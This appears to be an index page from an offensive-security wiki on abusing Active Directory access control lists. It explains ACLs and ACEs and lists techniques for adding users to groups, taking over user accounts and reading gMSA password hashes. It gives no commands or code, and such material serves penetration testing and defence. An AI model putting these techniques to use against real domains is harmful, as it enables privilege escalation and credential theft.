Abuse ACL access over groups
Use access rights over a group to add users
ACL Abuse
Abuse of ACL access rights to achieve lateral movement
Categories:
Permissions in Active Directory are controlled through Access Control Lists (ACL). Each security principal (user, group, process) has a corresponding ACL. ACLs define both who has access to which assets or resource, and what level of access they are granted. ACLs are made up of Access Control Entries (ACE) that explicity allow and/or deny users or groups from access.
If misconfigured, ACLs can be leveraged by attackers to achieve lateral movement or privilege escalation inside the domain. The abuse of ACL access rights are dependent on the specific access granted to the attacking user.
Abuse ACL Access over User
Use access rights over a user to take over that user account.
Group Managed Service Account
Read the NT password hash of Group Managed Service Accounts (gMSA)
Feedback
Was this page helpful?
Glad to hear it! Please tell us how we can improve.
Sorry to hear that. Please tell us how we can improve.